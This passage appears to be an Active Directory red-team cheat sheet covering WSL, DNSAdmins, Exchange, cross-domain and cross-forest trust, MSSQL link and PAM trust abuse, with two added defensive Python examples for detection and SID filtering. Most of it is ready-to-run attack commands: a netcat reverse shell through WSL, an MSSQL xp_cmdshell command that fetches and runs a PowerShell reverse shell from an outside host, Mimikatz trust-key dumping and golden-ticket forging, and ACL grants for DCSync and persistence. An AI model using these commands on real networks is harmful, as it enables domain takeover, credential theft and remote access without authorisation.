
```
# PSWA can be used to get a powershell session on port 443. 
# Default path
https://hostname/pswa

# Requires admin creds, available cmdlets can be restricted
Get-Command 
```

#### Abuse

```
# Depends on config, but look for sensitive commands and binaries.
Net.exe 
Reg.exe 
Invoke-Command 
Start-Process

# If a breakout is needed refer to JEA as well. 
```

#### Configure for Persistence

```
# Install
Install-WindowsFeature -Name WindowsPowerShellWebAccess

# Configure
Install-PswaWebApplication -useTestCertificate 

# Configure Rules (Wildcard * can be used for all values allowing all users / cmds)
Add-PswaAuthorizationRule -UserName <domain\user> -ComputerName <computer_name> -ConfigurationName <session_configuration_name> 
```

## Windows Subsystem Linux (WSL) Abuse

#### Enumeration

```
# Find linux distro on windows host, should see binaries and filesystem

# Can access files like on linux /etc/shadow etc. 

# Worth looking for keytab files. These allow linux to talk kerberos and can be cracked. https://github.com/sosdave/KeyTabExtract
python3 keytabextract.py /root/ADShare/wslhost.keytab
```

#### Abuse

```
# Run windows binaries with bash
bash.exe -c cmd.exe 

# Run windows binaries with wsl
wsl.exe cmd.exe 

# These run with permissions of WSL process, as current windows user.

# Reverse Shell
wsl.exe mknod /tmp/backpipe p && /bin/sh 0</tmp/backpipe | nc 192.168.100.1 443 1>/tmp/backpipe

# Can be useful for stealth since it is harder to detect malicious activity in WSL. ELF persistence would be very good.
```

## Windows Device Guard Bypass

#### Enumeration

```
# With Device Guard you will be in a constrained language mode shell with application whitelisting.

# List policies
Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
```

#### Bypass

```
# Known also as CLM bypasses, there are several online.
# Typically windows signed binaries allowed, worth trying:
Procdump.exe 
Psexec.exe
Reg.exe

# CLM Bypasses:

```

## DNSAdmins

#### Enumeration

{% tabs %}
{% tab title="PowerView" %}

```
Get-NetGroupMember -GroupName "DNSAdmins"
```

{% endtab %}

{% tab title="ADModule" %}

```
Get-ADGroupMember -Identity DNSAdmins
```

{% endtab %}
{% endtabs %}

#### Abuse

```
# Compromising a DNSAdmins user is necessary to perform this abuse

# Configure DLL using dnscmd.exe:
dnscmd DC /config /serverlevelplugindll \\172.16.50.100\dll\mimilib.dll 

# Configure DLL using DNSServer module:
$dnsettings = Get-DnsServerSetting -ComputerName dcorp-dc -Verbose -All
$dnsettings.ServerLevelPluginDll = "\\172.16.50.100\dll\mimilib.dll" 
Set-DnsServerSetting -InputObject $dnsettings -ComputerName DC -Verbose

# Restart DNS Service
sc \\DC stop dns 
sc \\DC start dns 

# By default, the mimilib.dll logs all DNS queries to C:\Windows\System32\kiwidns.log
```
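Both configuration paths above end in the same registry value, `ServerLevelPluginDll` under the DNS service parameters, so that value is the detection point. The code below is an added example, not the page's: it classifies a new plugin path by where the DLL loads from and raises alerts from constructed events modelled on Security event 4657 (registry value modified) and Sysmon event 13 (registry value set). Field names are the real ones; values are constructed except the UNC path, which is the one the page uses.

```python
"""Detection of ServerLevelPluginDll changes on a DNS server (the DNSAdmins path above).

Added example, not from the page. Events are constructed inline and modelled on
Security event 4657 (registry value modified) and Sysmon event 13 (registry
value set); field names are the real ones, the values are made up except the
UNC path, which is the one the page uses.
"""
PLUGIN_VALUE = "serverlevelplugindll"
SYSTEM32 = "c:\\windows\\system32\\"

# Constructed sample: a UNC plugin, a local plugin outside System32, an unrelated
# DNS setting, and the plugin value being cleared again.
EVENTS = [
    {"Source": "Security", "EventID": 4657, "Computer": "dcorp-dc.dcorp.local", "SubjectUserName": "student1",
     "ObjectName": "\\REGISTRY\\MACHINE\\SYSTEM\\ControlSet001\\Services\\DNS\\Parameters",
     "ObjectValueName": "ServerLevelPluginDll", "OldValue": "", "NewValue": "\\\\172.16.50.100\\dll\\mimilib.dll"},
    {"Source": "Sysmon", "EventID": 13, "Computer": "dcorp-dc.dcorp.local", "User": "DCORP\\svc_dnsadmin",
     "TargetObject": "HKLM\\System\\CurrentControlSet\\Services\\DNS\\Parameters\\ServerLevelPluginDll",
     "Details": "C:\\DNSPlugins\\filter.dll"},
    {"Source": "Security", "EventID": 4657, "Computer": "dcorp-dc.dcorp.local", "SubjectUserName": "Administrator",
     "ObjectName": "\\REGISTRY\\MACHINE\\SYSTEM\\ControlSet001\\Services\\DNS\\Parameters",
     "ObjectValueName": "NoRecursion", "OldValue": "0", "NewValue": "1"},
    {"Source": "Security", "EventID": 4657, "Computer": "dcorp-dc.dcorp.local", "SubjectUserName": "Administrator",
     "ObjectName": "\\REGISTRY\\MACHINE\\SYSTEM\\ControlSet001\\Services\\DNS\\Parameters",
     "ObjectValueName": "ServerLevelPluginDll", "OldValue": "\\\\172.16.50.100\\dll\\mimilib.dll", "NewValue": ""},
]


def classify_plugin_path(value):
    """Severity and reason for a new ServerLevelPluginDll value."""
    if not value:
        return "info", "plugin DLL cleared"
    if value.startswith("\\\\"):
        return "critical", "plugin DLL loaded from a network share (UNC path)"
    if not value.lower().startswith(SYSTEM32):
        return "high", "plugin DLL outside System32"
    return "high", "plugin DLL set inside System32; verify signer and change record"


def detect_dns_plugin_changes(events):
    """One alert per write to ServerLevelPluginDll, from either event source."""
    alerts = []
    for ev in events:
        if (ev["Source"] == "Security" and ev["EventID"] == 4657
                and ev["ObjectValueName"].lower() == PLUGIN_VALUE):
            value, actor = ev["NewValue"], ev["SubjectUserName"]
        elif (ev["Source"] == "Sysmon" and ev["EventID"] == 13
                and ev["TargetObject"].lower().endswith("\\dns\\parameters\\" + PLUGIN_VALUE)):
            value, actor = ev["Details"], ev["User"]
        else:
            continue
        severity, reason = classify_plugin_path(value)
        alerts.append({"host": ev["Computer"], "severity": severity, "reason": reason,
                       "value": value, "by": actor})
    return alerts


if __name__ == "__main__":
    for alert in detect_dns_plugin_changes(EVENTS):
        print(alert)
```

The 4657 path needs a SACL on the DNS Parameters key and "Audit Registry" enabled; Sysmon 13 needs a matching `RegistryEvent` rule. Pairing the alert with the DNS service restart that follows (the `sc stop`/`start` above) gives the full sequence.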

## Microsoft Exchange Abuse

#### Enumeration

```
# Exchange groups have high permissions. Look for groups such as:
# Organization Management (full control over the Exchange Windows Permissions group)
# Exchange Windows Permissions (WriteDACL on the domain object pre Server 2019)
# Exchange Trusted Subsystem (can modify the DACL of DNSAdmins and others; local admin on Exchange servers)
```

#### Abuse

```
# Own user in groups above or own exchange server
# PTH as user or exchange server

# Import ADModule and RACE
Import-Module .\ADModulemaster\Microsoft.ActiveDirectory.Management.dll
Import-Module .\ADModulemaster\ActiveDirectory\ActiveDirectory.psd1 
. .\RACE.ps1 

# Give user access to DC
Set-ADACL -SamAccountName DOMAIN\USER -DistinguishedName 'DC=techcorp,DC=local' -Server techcorp.local -Verbose

# Give DCSync 
Set-ADACL -SamAccountName DOMAIN\USER -DistinguishedName 'DC=techcorp,DC=local' -GUIDRight DCSync -Server techcorp.local -Verbose

# (As DA) Give the user WriteDACL over the Exchange Windows Permissions group for persistence
Set-DCPermissions -Method GroupDACL -DistinguishedName 'CN=Exchange Windows Permissions,OU=Microsoft Exchange Security Groups,DC=techcorp,DC=local' -SAMAccountName DOMAIN\USER -Verbose 

# (As user now added) Use that priv to modify acl of windows permissions and give write member 
Set-ADACL -SamAccountName DOMAIN\USER -DistinguishedName 'CN=Exchange Windows Permissions,OU=Microsoft Exchange Security Groups,DC=techcorp,DC=local' -GUIDRight WriteMember -Server techcorp.local -Verbose
```

## Cross-Domain Trust Tickets

#### Get Trust Key

```
# Mimikatz trust
Invoke-Mimikatz -Command '"lsadump::trust /patch"' -ComputerName DC 

# Mimikatz dcsync
Invoke-Mimikatz -Command '"lsadump::dcsync /user:DOMAIN\TARGETDOMAIN$"'
```

#### Forging Inter-Realm TGT

```
Invoke-Mimikatz -Command '"Kerberos::golden /user:Administrator /domain:DOMAIN /sid:S-1-5-21-1874506631-3250652063-538504511 /sids:S-1-5-21-280534878-14999702234-700767426-519 /rc4:HASH /service:krbtgt /target:TARGETDOMAIN.LOCAL /ticket:C:\AD\Tools\kekeo_old\trust_tkt.kirbi"'
```

| Command                                           | Function                                                |
| ------------------------------------------------- | ------------------------------------------------------- |
| Kerberos::golden                                  | Mimikatz Module                                         |
| /domain:DOMAIN.LOCAL                              | FQDN of the current domain                              |
| /sid:S-1-5-21-166606631-311152063-538504511       | SID of the current domain                               |
| /sids:S-1-5-21-282224878-1496977734-700767426-519 | SID of the enterprise admins group of the parent domain |
| /rc4:HASH                                         | RC4 of the trust key                                    |
| /user:Administrator                               | User to impersonate                                     |
| /service:krbtgt                                   | Target service in the parent domain                     |
| /target:TARGETDOMAIN.LOCAL                        | FQDN of the parent domain                               |
| /ticket:C:\AD\Tools\kekeo\trust\_tkt.kirbi        | Path where ticket is to be saved                        |

#### Get TGS for Service in target domain (CIFS below, but could be LDAP, HOST and HTTP) using trust ticket

```
.\asktgs.exe C:\AD\Tools\kekeo_old\trust_tkt.kirbi CIFS/DC.DOMAIN 
```

#### Use TGS to access service in target (may need to use twice)

```
# Convert and use TGS
.\kirbikator.exe lsa .\CIFS.DC.DOMAIN.kirbi

# Access
ls \\DC.DOMAIN\c$ 
```

## Cross-Domain using krbtgt Hash

#### Create Ticket Abusing SID History

```
# Get krbtgt
Invoke-Mimikatz -Command '"lsadump::lsa /patch"'

# Create token
Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:DOMAIN /sid:S-1-5-21-1874506631-3219952063-538504511 /sids:S-1-5-21-280534878-1496970234-700767426-519 /krbtgt:HASH /ticket:C:\AD\Tools\krbtgt_tkt.kirbi"'
```

In the command above, the Mimikatz `/sids` option forcibly sets SID History to the Enterprise Admins group for dollarcorp.moneycorp.local, which is the forest Enterprise Admins group.

#### Use Ticket

```
# PTT
Invoke-Mimikatz -Command '"kerberos::ptt C:\AD\Tools\krbtgt_tkt.kirbi"' 

# Access
ls \\DC.DOMAIN.local\c$

gwmi -class win32_operatingsystem -ComputerName dc.DOMAIN.local
```

#### Avoiding suspicious logs

```
Invoke-Mimikatz -Command '"kerberos::golden /user:dc$ /domain:DOMAIN.local /sid:S-1-5-21-1874506631-3219952063-538504511 /groups:516 /sids:S-1-5-21-280534878-1496970234-700767426-516,S-1-5-9 /krbtgt:HASH /ptt"'

# S-1-5-21-2578538781-2508153159-3419410681-516 – Domain Controllers 
# S-1-5-9 – Enterprise Domain Controllers

# Looks like DCs talking between each other and still grants us a ticket for the enterprise DCs.
```

## Cross-Forest Trust Tickets

#### Get Trust Key

```
# Mimikatz trust
Invoke-Mimikatz -Command '"lsadump::trust /patch"'

# Mimikatz dump
Invoke-Mimikatz -Command '"lsadump::lsa /patch"'
```

#### Creating inter-forest TGT

```
Invoke-Mimikatz -Command '"Kerberos::golden /user:Administrator /domain:DOMAIN.local /sid:S-1-5-21-1874506631-3219952063-538504511 /rc4:HASH /service:krbtgt /target:TARGETDOMAIN.local /ticket:C:\AD\Tools\kekeo_old\trust_forest_tkt.kirbi"'
```

#### Using inter-forest ticket to request TGS

```
.\asktgs.exe C:\AD\Tools\kekeo_old\trust_forest_tkt.kirbi CIFS/TARGET-dc.DOMAIN.local 
```

#### Use TGS

```
# Use TGS to access service
.\kirbikator.exe lsa .\CIFS.TARGET-dc.DOMAIN.local.kirbi

# Found file share:
Invoke-ShareFinder -Domain DOMAIN.local

# Check Access
ls \\TARGET-dc.DOMAIN.local\SharedwithDCorp\
```
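The cross-domain tickets above carry a `/sids` value and the cross-forest ticket does not; the difference is SID filtering on the trust. The model below is an added example, not the page's code and a simplification of the DC's logic: with filtering on (the default for external and forest trusts) every extra SID whose domain part is not a domain of the trusted side is dropped, while inside one forest (parent-child trusts) filtering is off by default and the injected Enterprise Admins SID survives. The domain SIDs are taken from the page's krbtgt example; the RID table and trust defaults are assumptions stated in the code.

```python
"""Model of SID filtering on trusts, for the /sids values in the trust-ticket commands above.

Added example, not from the page; a simplified model, not the DC's full logic.
Rule modelled: when SID filtering is on (default for external and forest trusts),
every SID in the ticket's extra-SID list whose domain part is not a domain of the
trusted side is dropped. Inside one forest (parent-child trust) filtering is off
by default, so the injected Enterprise Admins SID survives.
"""
import re

PRIVILEGED_RIDS = {500: "Administrator", 512: "Domain Admins", 516: "Domain Controllers",
                   518: "Schema Admins", 519: "Enterprise Admins"}
DOMAIN_SID_RE = re.compile(r"^(S-1-5-21-\d+-\d+-\d+)-(\d+)$")
# Default SID-filtering state per trust type (assumption matching Windows defaults).
FILTERING_DEFAULT = {"parent-child": False, "forest": True, "external": True}

CHILD_DOMAIN = "S-1-5-21-1874506631-3219952063-538504511"   # the page's /sid value (child)
ROOT_DOMAIN = "S-1-5-21-280534878-1496970234-700767426"     # domain part of the page's /sids value
ROOT_EA = ROOT_DOMAIN + "-519"                              # forest-root Enterprise Admins


def split_sid(sid):
    """(domain part, RID) for a domain SID; (None, None) for well-known ones such as S-1-5-9."""
    m = DOMAIN_SID_RE.match(sid)
    return (m.group(1), int(m.group(2))) if m else (None, None)


def filter_extra_sids(extra_sids, trusted_domain_sids, sid_filtering):
    """Split the extra SIDs into those the trusting DC keeps and those it drops."""
    kept, dropped = [], []
    for sid in extra_sids:
        domain, _ = split_sid(sid)
        if sid_filtering and domain not in trusted_domain_sids:
            dropped.append(sid)      # foreign or well-known SID: filtered
        else:
            kept.append(sid)
    return kept, dropped


def evaluate_ticket(trust_type, trusted_domain_sids, extra_sids):
    """What survives in a ticket crossing `trust_type` from the domains in
    `trusted_domain_sids`, and which surviving SIDs are privileged."""
    kept, dropped = filter_extra_sids(extra_sids, set(trusted_domain_sids),
                                      FILTERING_DEFAULT[trust_type])
    privileged = []
    for sid in kept:
        _, rid = split_sid(sid)
        if rid in PRIVILEGED_RIDS:
            privileged.append((sid, PRIVILEGED_RIDS[rid]))
    return {"kept": kept, "dropped": dropped, "privileged_kept": privileged}


if __name__ == "__main__":
    print("parent-child:", evaluate_ticket("parent-child", [CHILD_DOMAIN], [ROOT_EA]))
    print("forest:", evaluate_ticket("forest", [CHILD_DOMAIN], [ROOT_EA, "S-1-5-9"]))
```

Enabling SID filtering on the intra-forest trust (`netdom trust ... /quarantine:yes`) makes the parent-child case behave like the forest case in this model, which is the mitigation for the SID-History path at the cost of breaking legitimate SID-History use across that trust.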

## MSSQL Trust Abuse

PowerUpSQL: <https://github.com/NetSPI/PowerUpSQL>

#### Finding MSSQL Instances

```
# Discovery (SPN Scanning): 
Get-SQLInstanceDomain

# Check Accessibility: 
Get-SQLConnectionTestThreaded

# Use together:
Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -Verbose 

# Gather Information: 
Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose
```

#### Enumerating Database Links

{% tabs %}
{% tab title="PowerUpSQL" %}

```
# Look for links to remote servers
Get-SQLServerLink -Instance instance-mssql -Verbose

# Enumerating nested database links 
Get-SQLServerLinkCrawl -Instance instance-mssql -Verbose
```

{% endtab %}

{% tab title="Manual SQL" %}

```
# look for links to remote servers
select * from openquery("INSTANCE",'select * from master..sysservers')

# Enumerating nested database links 
select * from openquery("INSTANCE",'select * from openquery("dcorpmgmt",''select * from master..sysservers'')')
```

{% endtab %}
{% endtabs %}

#### Enabling xp\_cmdshell if RPC Out is enabled (disabled by default)

```
EXECUTE('sp_configure ''xp_cmdshell'',1;reconfigure;') AT "INSTANCE"
```

#### Executing Commands

{% tabs %}
{% tab title="PowerUpSQL" %}

```
# Executes command over link
Get-SQLServerLinkCrawl -Instance INSTANCE -Query "exec master..xp_cmdshell 'whoami'"

# shell
Get-SQLServerLinkCrawl -Instance INSTANCE -Query "powershell.exe iex (iwr http://192.168.50.51/Invoke-PowerShellTcp.ps1 -UseBasicParsing);Invoke-PowerShellTcp -Reverse -IPAddress 192.168.50.51 -Port 443"
```

{% endtab %}

{% tab title="Manual SQL" %}

```
# Executes command over nested links
select * from openquery("dcorp-sql1",'select * from openquery("dcorpmgmt",''select * from openquery("eu-sql",''''select @@version as version;exec master..xp_cmdshell "powershell whoami"'''')'')')
```

{% endtab %}
{% endtabs %}

## PAM Trust

PAM (Privileged Access Management) introduces a bastion forest for management and Shadow Security Principals (groups in the bastion forest mapped to high-privilege groups of the managed forests). These allow management of other forests without changing groups or ACLs there and without interactive logon. Temporary group membership is also introduced, so permissions are only granted for a set time.

#### Enumeration

```
# Import ADModule

# Detect if current forest is PAM trust
Get-ADTrust -Filter {(ForestTransitive -eq $True) -and (SIDFilteringQuarantined -eq $False)}

# Enumerate Shadow Principals
Get-ADObject -SearchBase ("CN=Shadow Principal Configuration,CN=Services," + (Get-ADRootDSE).configurationNamingContext) -Filter * -Properties * | select Name,member,msDS-ShadowPrincipalSid | fl

# Enumerate if current forest is managed by a bastion forest
Get-ADTrust -Filter {(ForestTransitive -eq $True)} 
# Trust_Attribute_PIM_Trust + Trust_Attribute_Treat_As_External = PAM
```

#### Abuse

```
# Find users with shadow principals and names of shadow principal objects
Get-ADObject -SearchBase ("CN=Shadow Principal Configuration,CN=Services," + (Get-ADRootDSE).configurationNamingContext) -Filter * -Properties * | select Name,member,msDS-ShadowPrincipalSid | fl

# Add a compromised user to the group 
Set-ADObject -Identity "CN=forest-ShadowEnterpriseAdmin,CN=Shadow Principal Configuration,CN=Services,CN=Configuration,DC=gcbsec,DC=local" -Add @{'member'="CN=Administrator,CN=Users,DC=gcbsec,DC=local"}

# Once compromised you can manage forests with EA permissions.
```


